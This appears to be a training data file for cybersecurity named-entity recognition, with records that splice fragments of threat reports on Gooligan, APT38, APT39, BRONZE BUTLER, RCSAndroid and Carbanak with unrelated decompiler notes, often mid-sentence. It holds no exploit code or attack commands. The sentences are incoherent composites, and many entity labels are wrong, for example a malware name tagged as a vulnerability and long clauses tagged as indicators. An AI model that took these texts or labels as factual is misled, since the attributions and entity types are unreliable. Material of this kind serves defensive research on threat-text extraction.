{"text": "Gooligan-infected apps can also be installed using phishing scams where attackers broadcast links to infected apps to unsuspecting users via SMS or other messaging services . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) . This results in The email would start a conversation between the attackers and victims sometimes being quite lengthy to establish trust , which would include the attackers encouraging the victim to open a registration link hosted by a real website that had already been compromised by the attackers .", "spans": [{"start": 0, "end": 17, "label": "Malware"}, {"start": 284, "end": 289, "label": "Organization"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 326, "end": 337, "label": "Organization"}, {"start": 358, "end": 365, "label": "Organization"}, {"start": 659, "end": 672, "label": "Organization"}, {"start": 689, "end": 695, "label": "Organization"}]}
{"text": "How did Gooligan emerge ? APT38 . the lowest bit of the negated value becoming 1 . On 24 February , a cyber - attack against Viasat began approximately 1 hour before Russia launched its major invasion of Ukraine .", "spans": [{"start": 8, "end": 16, "label": "Malware"}, {"start": 26, "end": 31, "label": "Organization"}, {"start": 125, "end": 131, "label": "Organization"}]}
{"text": "Our researchers first encountered Gooligan \u2019 s code in the malicious SnapPea app last year . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . Thus , In light of this , Mandiant has used the following approaches to identify potential exploitation of CVE-2023 - 4966 and subsequent session hijacking .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 69, "end": 76, "label": "Malware"}, {"start": 140, "end": 148, "label": "System"}, {"start": 155, "end": 163, "label": "System"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 253, "end": 257, "label": "Organization"}, {"start": 286, "end": 294, "label": "Organization"}, {"start": 367, "end": 382, "label": "Vulnerability"}]}
{"text": "At the time this malware was reported by several security vendors , and attributed to different malware families like Ghostpush , MonkeyTest , and Xinyinhe . APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy . OR by -2 ( 0xFFFFFFFE ) But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": [{"start": 118, "end": 127, "label": "Malware"}, {"start": 130, "end": 140, "label": "Malware"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 158, "end": 163, "label": "Organization"}, {"start": 180, "end": 202, "label": "Organization"}, {"start": 367, "end": 371, "label": "Organization"}]}
{"text": "By late 2015 , the malware \u2019 s creators had gone mostly silent until the summer of 2016 when the malware reappeared with a more complex architecture that injects malicious code into Android system processes . We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East . will always produce the value -1 . Days later , KillNet claimed to target the European Investment Bank ( EIB ) .", "spans": [{"start": 182, "end": 189, "label": "System"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 423, "end": 430, "label": "Organization"}, {"start": 453, "end": 477, "label": "Organization"}, {"start": 480, "end": 483, "label": "Organization"}]}
{"text": "The change in the way the malware works today may be to help finance the campaign through fraudulent ad activity . APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats . In this case , If this is the primary reason why someone might be after your companys data , simple preventative measures could be used to deter these attacks from happening .", "spans": [{"start": 115, "end": 120, "label": "Organization"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 218, "end": 225, "label": "Organization"}]}
{"text": "The malware simulates clicks on app advertisements provided by legitimate ad networks and forces the app to install on a device . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . the pattern matching function replaces dword_745BB58C * ( dword_745BB58C \u2013 1 ) Investigate anomalous activity and correlate findings with process telemetry .", "spans": [{"start": 130, "end": 135, "label": "Organization"}, {"start": 152, "end": 192, "label": "Organization"}, {"start": 279, "end": 299, "label": "Organization"}]}
{"text": "An attacker is paid by the network when one of these apps is installed successfully . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents . with 2 . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": [{"start": 92, "end": 98, "label": "Organization"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 215, "end": 236, "label": "Organization"}, {"start": 239, "end": 250, "label": "Organization"}, {"start": 253, "end": 264, "label": "Organization"}, {"start": 271, "end": 281, "label": "Organization"}, {"start": 319, "end": 332, "label": "Organization"}, {"start": 368, "end": 375, "label": "Organization"}, {"start": 437, "end": 450, "label": "System"}]}
{"text": "Logs collected by Check Point researchers show that every day Gooligan installs at least 30,000 apps fraudulently on breached devices or over 2 million apps since the campaign began . Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands . The global variable value dword_72DBB588 is always 0 because the value is not initialized ( we can check it by is_loaded API ) This markup becomes unescaped , causing arbitrary markup to be injected into the document .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 184, "end": 190, "label": "System"}, {"start": 231, "end": 238, "label": "Organization"}, {"start": 412, "end": 425, "label": "System"}, {"start": 428, "end": 517, "label": "Vulnerability"}]}
{"text": "How does Gooligan work ? Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . and has only read accesses . The goal of studying IoAs is to understand the intent of a malicious user accessing the information and network resources of the organization , even when a malicious payload is not yet delivered , and all computing interactions can be considered as legitimate and authorized .", "spans": [{"start": 9, "end": 17, "label": "Malware"}, {"start": 25, "end": 31, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 194, "end": 198, "label": "Indicator"}, {"start": 232, "end": 246, "label": "Organization"}, {"start": 329, "end": 346, "label": "Malware"}]}
{"text": "The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B . So the pattern matching function replaces the global variable with 0 . 3AM is socalled because it appends encrypted files with the extension .threeamtime .", "spans": [{"start": 58, "end": 75, "label": "Malware"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 139, "end": 146, "label": "Organization"}, {"start": 154, "end": 171, "label": "System"}, {"start": 210, "end": 216, "label": "Organization"}, {"start": 224, "end": 239, "label": "System"}, {"start": 244, "end": 261, "label": "System"}, {"start": 335, "end": 338, "label": "Malware"}]}
{"text": "Our research team has found infected apps on third-party app stores , but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages . APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc . There are some variants with this pattern ( e.g , the variable \u2013 10 < 0 ) Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": [{"start": 107, "end": 114, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 251, "end": 274, "label": "System"}, {"start": 277, "end": 280, "label": "System"}, {"start": 285, "end": 297, "label": "System"}, {"start": 300, "end": 303, "label": "System"}, {"start": 308, "end": 314, "label": "System"}, {"start": 317, "end": 323, "label": "System"}, {"start": 330, "end": 337, "label": "System"}, {"start": 425, "end": 438, "label": "Organization"}, {"start": 443, "end": 457, "label": "System"}, {"start": 462, "end": 492, "label": "Organization"}, {"start": 547, "end": 559, "label": "Malware"}, {"start": 597, "end": 617, "label": "System"}]}
{"text": "After an infected app is installed , it sends data about the device to the campaign \u2019 s Command and Control ( C & C ) server . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation . , Command messages are used in ICS networks to give direct instructions to control systems devices .", "spans": [{"start": 131, "end": 136, "label": "Organization"}]}
{"text": "Gooligan then downloads a rootkit from the C & C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT ( CVE-2013-6282 ) and Towelroot ( CVE-2014-3153 ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . where the immediate constant can be different . PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 89, "end": 104, "label": "System"}, {"start": 139, "end": 144, "label": "Vulnerability"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 167, "end": 176, "label": "Vulnerability"}, {"start": 179, "end": 192, "label": "Vulnerability"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 251, "end": 258, "label": "Organization"}, {"start": 302, "end": 318, "label": "Vulnerability"}, {"start": 444, "end": 455, "label": "Organization"}, {"start": 506, "end": 512, "label": "System"}]}
{"text": "These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android , or the patches were never installed by the user . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . We also observed a pattern that was also using an 8-bit portion of the register . Depending on the campaign , the final payload or the third intermediate stage is appended as an encrypted binary blob to the end of the image .", "spans": [{"start": 128, "end": 135, "label": "System"}, {"start": 218, "end": 234, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 304, "end": 320, "label": "Vulnerability"}, {"start": 446, "end": 457, "label": "Organization"}]}
{"text": "If rooting is successful , the attacker has full control of the device and can execute privileged commands remotely . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" . In the following example , US by the numbers", "spans": [{"start": 137, "end": 149, "label": "Organization"}, {"start": 178, "end": 188, "label": "Organization"}]}
{"text": "After achieving root access , Gooligan downloads a new , malicious module from the C & C server and installs it on the infected device . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . the variable v5 in pseudocode is a register operand ( cl ) Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": [{"start": 30, "end": 38, "label": "Malware"}, {"start": 137, "end": 146, "label": "Organization"}, {"start": 157, "end": 173, "label": "Organization"}, {"start": 191, "end": 232, "label": "Vulnerability"}, {"start": 235, "end": 248, "label": "Vulnerability"}, {"start": 295, "end": 301, "label": "System"}]}
{"text": "This module injects code into running Google Play or GMS ( Google Mobile Services ) to mimic user behavior so Gooligan can avoid detection , a technique first seen with the mobile malware HummingBad . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . in microcode . Anonymous Sudan", "spans": [{"start": 38, "end": 49, "label": "System"}, {"start": 53, "end": 83, "label": "System"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 188, "end": 198, "label": "Malware"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 244, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 348, "end": 354, "label": "System"}, {"start": 430, "end": 445, "label": "Organization"}]}
{"text": "The module allows Gooligan to : Steal a user \u2019 s Google email account and authentication token information Install apps from Google Play and rate them to raise their reputation Install adware to generate revenue Ad servers , which don \u2019 t know whether an app using its service is malicious or not , send Gooligan the names of the apps to download from Google Play . BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics . We need to check if the value comes from the result of x * ( x \u2013 1 ) Tools used by the attackers in this campaign included", "spans": [{"start": 18, "end": 26, "label": "Malware"}, {"start": 49, "end": 55, "label": "Organization"}, {"start": 125, "end": 136, "label": "System"}, {"start": 304, "end": 312, "label": "Malware"}, {"start": 352, "end": 363, "label": "System"}, {"start": 366, "end": 376, "label": "Organization"}, {"start": 445, "end": 453, "label": "Organization"}, {"start": 525, "end": 530, "label": "System"}, {"start": 543, "end": 552, "label": "Organization"}, {"start": 561, "end": 569, "label": "Organization"}]}
{"text": "After an app is installed , the ad service pays the attacker . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . . An additional field of interest in the XPdb was the exec_cdhash , which contains the cdhash , or Code Directory hash , of the executed binaries .", "spans": [{"start": 63, "end": 76, "label": "Organization"}, {"start": 93, "end": 106, "label": "Organization"}, {"start": 111, "end": 115, "label": "Organization"}, {"start": 123, "end": 143, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 253, "end": 266, "label": "Organization"}, {"start": 269, "end": 294, "label": "Organization"}, {"start": 301, "end": 321, "label": "Organization"}, {"start": 398, "end": 469, "label": "Indicator"}]}
{"text": "Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C & C server . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . In another example , Last , it sends a single \u201c C_CS_NA_1 \u2013 clock synchronization command \u201d to the target station , which synchronizes the remote station time clock with the time clock for the device issuing the commands .", "spans": [{"start": 63, "end": 74, "label": "System"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 155, "end": 168, "label": "Organization"}, {"start": 173, "end": 177, "label": "Organization"}, {"start": 185, "end": 205, "label": "Organization"}, {"start": 236, "end": 255, "label": "Organization"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 292, "end": 317, "label": "Organization"}, {"start": 324, "end": 344, "label": "Organization"}]}
{"text": "Our research team was able to identify several instances of this activity by cross-referencing data from breached devices with Google Play app reviews . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . the variable v2 in pseudocode is a register operand ( ecx ) WarDefense extrinsic In the 21st century it would be irresponsible to ignore the fact that nation states and even patriot hackers play in either initiating or defending against adversaries .", "spans": [{"start": 127, "end": 138, "label": "System"}, {"start": 163, "end": 176, "label": "Organization"}, {"start": 257, "end": 272, "label": "Malware"}, {"start": 487, "end": 502, "label": "Organization"}, {"start": 550, "end": 561, "label": "Organization"}]}
{"text": "This is another reminder of why users shouldn \u2019 t rely on ratings alone to decide whether to trust an app . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets . in microcode . Evidence of compromise was observed within the JumpCloud agent log located at the file path /private / var / log / jcagent.log .", "spans": [{"start": 118, "end": 131, "label": "Organization"}, {"start": 242, "end": 257, "label": "Malware"}, {"start": 356, "end": 439, "label": "Indicator"}]}
{"text": "Similar to HummingBad , the malware also fakes device identification information , such as IMEI and IMSI , to download an app twice while seeming like the installation is happening on a different device , thereby doubling the potential revenue . Secureworks\u00ae incident responders and Counter Threat Unit\u2122 ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People . We have to validate if a global variable with above-mentioned conditions is assigned to the register . While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month \u2019s review we speculated that Royal might be going through a rebrand .", "spans": [{"start": 11, "end": 21, "label": "Malware"}, {"start": 246, "end": 258, "label": "Organization"}, {"start": 306, "end": 309, "label": "Organization"}, {"start": 368, "end": 381, "label": "Organization"}, {"start": 398, "end": 402, "label": "Organization"}, {"start": 405, "end": 417, "label": "Organization"}, {"start": 710, "end": 715, "label": "Organization"}]}
{"text": "What are Google authorization tokens ? Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . Data-flow tracking code was added to detect these use-cases . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": [{"start": 9, "end": 15, "label": "Organization"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 237, "end": 261, "label": "Organization"}, {"start": 334, "end": 341, "label": "Organization"}]}
{"text": "A Google authorization token is a way to access the Google account and the related services of a user . BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools . The added code requires that the mblock_t pointer information is passed from the argument of optinsn_t : :f unc to trace back previous instructions using the mblock_t linked list . Table 1 : Malicious OT files Filename Hash Purpose a.iso Unknown Contains attacker \u2019s files lun.vbs 26e2a41f26ab885bf409982cb823ffd1", "spans": [{"start": 2, "end": 8, "label": "Organization"}, {"start": 52, "end": 58, "label": "Organization"}, {"start": 104, "end": 117, "label": "Organization"}, {"start": 165, "end": 173, "label": "System"}, {"start": 178, "end": 186, "label": "System"}, {"start": 207, "end": 213, "label": "System"}, {"start": 218, "end": 224, "label": "System"}, {"start": 268, "end": 276, "label": "System"}, {"start": 328, "end": 346, "label": "System"}, {"start": 393, "end": 401, "label": "System"}, {"start": 426, "end": 515, "label": "Indicator"}]}
{"text": "It is issued by Google once a user successfully logged into this account . BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment . However , Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": [{"start": 16, "end": 22, "label": "Organization"}, {"start": 75, "end": 88, "label": "Organization"}, {"start": 302, "end": 519, "label": "Malware"}]}
{"text": "When an authorization token is stolen by a hacker , they can use this token to access all the Google services related to the user , including Google Play , Gmail , Google Docs , Google Drive , and Google Photos . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . the callback returns NULL from the mblock_t pointer if the instruction is not a top-level one . Also in 2015 , GReAT identified the Minidionis threat ( known by Kaspersky as CloudLook ) to be another backdoor from the same APT actor \u2013 this time using a cloud drive capability to store and download malware onto infected systems using a multi - dropper scheme .", "spans": [{"start": 94, "end": 100, "label": "Organization"}, {"start": 142, "end": 153, "label": "System"}, {"start": 156, "end": 161, "label": "System"}, {"start": 164, "end": 175, "label": "System"}, {"start": 178, "end": 190, "label": "System"}, {"start": 197, "end": 210, "label": "System"}, {"start": 213, "end": 226, "label": "Organization"}, {"start": 282, "end": 304, "label": "Vulnerability"}, {"start": 499, "end": 507, "label": "System"}, {"start": 575, "end": 580, "label": "Organization"}, {"start": 596, "end": 606, "label": "Malware"}, {"start": 625, "end": 634, "label": "Organization"}, {"start": 638, "end": 647, "label": "Malware"}, {"start": 687, "end": 696, "label": "Organization"}]}
{"text": "While Google implemented multiple mechanisms , like two-factor-authentication , to prevent hackers from compromising Google accounts , a stolen authorization token bypasses this mechanism and allows hackers the desired access as the user is perceived as already logged in . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . If the setl is always sub-instruction during the optimization , These groups commonly share infrastructure to complete their actions on objectives .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 117, "end": 123, "label": "Organization"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 339, "end": 361, "label": "Vulnerability"}, {"start": 591, "end": 667, "label": "Indicator"}]}
{"text": "Conclusion Gooligan has breached over a million Google accounts . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . we never get the pointer . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": [{"start": 11, "end": 19, "label": "Malware"}, {"start": 48, "end": 54, "label": "Organization"}, {"start": 66, "end": 79, "label": "Organization"}, {"start": 162, "end": 176, "label": "System"}, {"start": 202, "end": 216, "label": "Vulnerability"}, {"start": 274, "end": 286, "label": "Malware"}]}
{"text": "We believe that it is the largest Google account breach to date , and we are working with Google to continue the investigation . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . To handle this type of scenario , For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 90, "end": 96, "label": "Organization"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 221, "end": 235, "label": "System"}, {"start": 261, "end": 275, "label": "Vulnerability"}, {"start": 455, "end": 465, "label": "System"}]}
{"text": "We encourage Android users to validate whether their accounts have been breached . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . the code was modified to catch and pass the mblock_t of the jnz instruction to the sub-instruction . For instance , Rising Sun was observed in attacks before the discovery of ' Sharpshooter ' and shared the tactics , techniques , and procedures ( TTPs ) seen in operations attributed to Lazarus group .", "spans": [{"start": 13, "end": 20, "label": "System"}, {"start": 83, "end": 96, "label": "Organization"}, {"start": 133, "end": 141, "label": "System"}, {"start": 146, "end": 149, "label": "System"}, {"start": 269, "end": 277, "label": "System"}, {"start": 341, "end": 351, "label": "System"}, {"start": 402, "end": 414, "label": "System"}, {"start": 428, "end": 478, "label": "Organization"}, {"start": 512, "end": 525, "label": "Organization"}]}
{"text": "Hacking Team Spying Tool Listens to Calls By : Trend Micro July 21 , 2015 Following news that iOS devices are at risk of spyware related to the Hacking Team , the saga continues into the Android sphere . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . The original implementation calls the optblock_t : :f unc callback function in MMAT_LOCOPT ( local optimization and graphing are complete ) Today \u2019s announcement comes as cyber security leaders from the 5 Eyes , EU and international allies meet at the NCSC \u2019s Cyber UK conference in Newport to discuss the cyber threats facing the world .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 47, "end": 58, "label": "Organization"}, {"start": 94, "end": 97, "label": "System"}, {"start": 144, "end": 156, "label": "Organization"}, {"start": 187, "end": 194, "label": "System"}, {"start": 243, "end": 254, "label": "Organization"}, {"start": 266, "end": 279, "label": "Organization"}, {"start": 346, "end": 359, "label": "Vulnerability"}, {"start": 484, "end": 503, "label": "System"}, {"start": 525, "end": 536, "label": "System"}, {"start": 617, "end": 639, "label": "Organization"}, {"start": 649, "end": 655, "label": "Organization"}, {"start": 658, "end": 660, "label": "Organization"}, {"start": 665, "end": 685, "label": "Organization"}, {"start": 698, "end": 725, "label": "Organization"}]}
{"text": "We found that among the leaked files is the code for Hacking Team \u2019 s open-source malware suite RCSAndroid ( Remote Control System Android ) , which was sold by the company as a tool for monitoring targets . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . maturity level . Additionally , by using leaked source code , threat actors can confuse or mislead investigators , as security professionals may be more likely to misattribute the activity to the wrong actor .", "spans": [{"start": 96, "end": 106, "label": "Malware"}, {"start": 109, "end": 138, "label": "Malware"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 290, "end": 303, "label": "Organization"}, {"start": 370, "end": 383, "label": "Vulnerability"}, {"start": 588, "end": 610, "label": "Organization"}, {"start": 633, "end": 677, "label": "Vulnerability"}]}
{"text": "( Researchers have been aware of this suite as early as 2014 . Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm . Rolles previously explained the unflattening algorithm in a Hex-Rays blog . Then , users were prompted to download a malicious trojan .", "spans": [{"start": 96, "end": 99, "label": "Organization"}, {"start": 124, "end": 132, "label": "System"}, {"start": 144, "end": 157, "label": "Organization"}, {"start": 167, "end": 175, "label": "System"}, {"start": 266, "end": 274, "label": "System"}, {"start": 321, "end": 339, "label": "Malware"}]}
{"text": ") The RCSAndroid code can be considered one of the most professionally developed and sophisticated Android malware ever exposed . BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan . For brevity I will quickly cover some key points to understand the algorithm at a high level . When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": [{"start": 6, "end": 16, "label": "Malware"}, {"start": 99, "end": 106, "label": "System"}, {"start": 130, "end": 143, "label": "Organization"}, {"start": 181, "end": 195, "label": "Organization"}]}
{"text": "The leak of its code provides cybercriminals with a new weaponized resource for enhancing their surveillance operations . Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . Normally the call flow graph ( CFG ) The generic campaigns are aimed at various civilian targets in Poland and Ukraine , such as with Excel spreadsheet lures masquerading as value - added tax ( VAT ) return forms .", "spans": [{"start": 122, "end": 130, "label": "Organization"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 355, "end": 376, "label": "Organization"}, {"start": 452, "end": 488, "label": "Organization"}, {"start": 492, "end": 530, "label": "Organization"}]}
{"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture screenshots using the \u201c screencap \u201d command and framebuffer direct reading Monitor clipboard content Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . of a function obfuscated with control flow flattening has a loop structure starting with yellow-colored \u201c control flow dispatcher \u201d None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": [{"start": 31, "end": 41, "label": "Malware"}, {"start": 288, "end": 293, "label": "System"}, {"start": 296, "end": 304, "label": "System"}, {"start": 307, "end": 314, "label": "System"}, {"start": 317, "end": 323, "label": "System"}, {"start": 326, "end": 334, "label": "System"}, {"start": 337, "end": 341, "label": "System"}, {"start": 348, "end": 356, "label": "System"}, {"start": 409, "end": 414, "label": "System"}, {"start": 542, "end": 550, "label": "Vulnerability"}, {"start": 593, "end": 600, "label": "System"}, {"start": 618, "end": 627, "label": "Organization"}]}
{"text": "messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger . Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . like this , The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show \u2019s producers at the Warner Bros. production company Wall to Wall Media .", "spans": [{"start": 38, "end": 56, "label": "System"}, {"start": 59, "end": 67, "label": "System"}, {"start": 70, "end": 75, "label": "System"}, {"start": 78, "end": 83, "label": "System"}, {"start": 86, "end": 90, "label": "System"}, {"start": 93, "end": 99, "label": "System"}, {"start": 102, "end": 110, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 128, "end": 148, "label": "System"}, {"start": 151, "end": 159, "label": "Organization"}, {"start": 228, "end": 241, "label": "Organization"}, {"start": 424, "end": 439, "label": "Organization"}, {"start": 444, "end": 458, "label": "Organization"}, {"start": 523, "end": 535, "label": "Organization"}, {"start": 555, "end": 573, "label": "Organization"}]}
{"text": "Capture real-time voice calls in any network or app by hooking into the \u201c mediaserver \u201d system service RCSAndroid in the Wild Our analysis reveals that this RCSAndroid ( AndroidOS_RCSAgent.HRX ) has been in the wild since 2012 . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . shown after the First Block . This sample works in tandem with PIEHOP , which sets up the execution .", "spans": [{"start": 103, "end": 113, "label": "Malware"}, {"start": 157, "end": 167, "label": "Malware"}, {"start": 170, "end": 192, "label": "Indicator"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 280, "end": 327, "label": "System"}, {"start": 330, "end": 335, "label": "System"}]}
{"text": "Traces of its previous uses in the wild were found inside the configuration file : It was configured to use a Command-and-control ( C & C ) server in the United States ; however , the server was bought from a host service provider and is now unavailable . Carbanak is a backdoor used by the attackers to compromise the victim . The original code is separated into the orange-colored \u201c first block \u201d An internal data defense strategy requires prevention , detection and response capabilities .", "spans": [{"start": 256, "end": 264, "label": "Malware"}, {"start": 270, "end": 278, "label": "System"}, {"start": 291, "end": 300, "label": "Organization"}]}
{"text": "It was configured to activate via SMS sent from a Czech Republic number . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . and green-colored flattened blocks . It is only when evaluating indicators of attack in the big picture , that the patterns of data collection and attempts to access the network start resembling an adversary with malicious intent .", "spans": [{"start": 106, "end": 114, "label": "Vulnerability"}, {"start": 283, "end": 296, "label": "Vulnerability"}, {"start": 396, "end": 416, "label": "Indicator"}, {"start": 530, "end": 561, "label": "Organization"}]}
{"text": "Attackers can send SMS with certain messages to activate the agent and trigger corresponding action . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . The analyst is then required to resolve the correct next block and modify the destination accordingly . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": [{"start": 159, "end": 182, "label": "System"}, {"start": 185, "end": 188, "label": "System"}, {"start": 193, "end": 201, "label": "Vulnerability"}, {"start": 360, "end": 365, "label": "Organization"}]}
